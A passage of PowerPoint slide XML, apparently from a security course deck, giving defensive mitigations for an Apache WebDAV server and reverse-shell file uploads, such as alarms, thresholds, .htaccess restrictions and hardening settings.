                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Strengthen username and passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Restrict access to authentication URL’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Enable multifactor Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Enable tailored ELK stack detection rules (not default).  Refer to reference 11</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0"/>
              <a:t>Describe the solution. If possible, provide the required command line(s)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Install and configure a firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Install mod_evasive (An Apache Web Services Module)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Set HTTP Limits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Change the default settings of the Apache Server in particular the account which runs the service to a non-privileged account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Please refer to references 9, 11, 14 and 15.</a:t>
            </a:r>
            <a:endParaRPr sz="10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7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Detecting the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231" name="Google Shape;1231;p7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32" name="Google Shape;1232;p73"/>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000" b="1" dirty="0"/>
              <a:t>What kind of alarm can be set to detect future access to this directory?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>An alarm should be set if any connection is made to the WebDAV directory from an external network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Set an alarm that specifies the unique HTTP headers used with WebDAV</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>A single instance at this point in time, however if remote work is required additional tuning will be required.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1233" name="Google Shape;1233;p73"/>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000" b="1" dirty="0"/>
              <a:t>What configuration can be set on the host to control access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Patch the server iaw best practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Limit use of WebDAV to internal IP only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Limit use of WebDAV to authorised users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Correctly configure Apache iaw the guidelines stated here.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Describe the solution. If possible, provide the required command line(s). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Consider an alternative solution to file sharing and editing with greater security controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Add a firewall and implement it iaw best practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0" err="1"/>
              <a:t>mod_evasive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t> (An Apache Web Services Module)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Hide the server details by editing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0" err="1"/>
              <a:t>ServerSignature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t> Off </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0" err="1"/>
              <a:t>ServerTokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t> Prod</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Disable SSI, CGI, .htaccess override, ETag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="14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Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="Google Shape;1239;p7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40" name="Google Shape;1240;p74"/>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000" b="1" dirty="0"/>
              <a:t>What kind of alarm can be set to detect future file uploads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Create an alert for invalid file uploads </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>The alert threshold should be set to 1.  Any file that is uploaded to the server that is not on the approved list of valid types should be investigated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>This is not my preferred solution please refer to the right, in that the Apache server should be configured correctly and tested to ensure it is secure.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1241" name="Google Shape;1241;p74"/>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000" b="1" dirty="0"/>
              <a:t>What configuration can be set on the host to block file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Modify the .htaccess file to expected file types only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Modify the .htaccess file to upload files anywhere but root directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Modify the .htaccess file to disable the PHP engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Modify the permissions of the designated folder so they can't be executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Patch the Apache server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Review the use of the WebDAV service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Modify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t> file iaw the references 9 and 19</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0"/>
              <a:t>Describe the solution. If possible, provide the required command line. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Guidance on the correct configuration of the Apache server can be gleaned at reference 9 and 19.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Security testing should be conducted after all configuration changes iaw best practices</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="14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137F3495-2DF3-CA54-6C33-08650F16294A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="277550"/>
            <a:ext cx="9144000" cy="380541"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
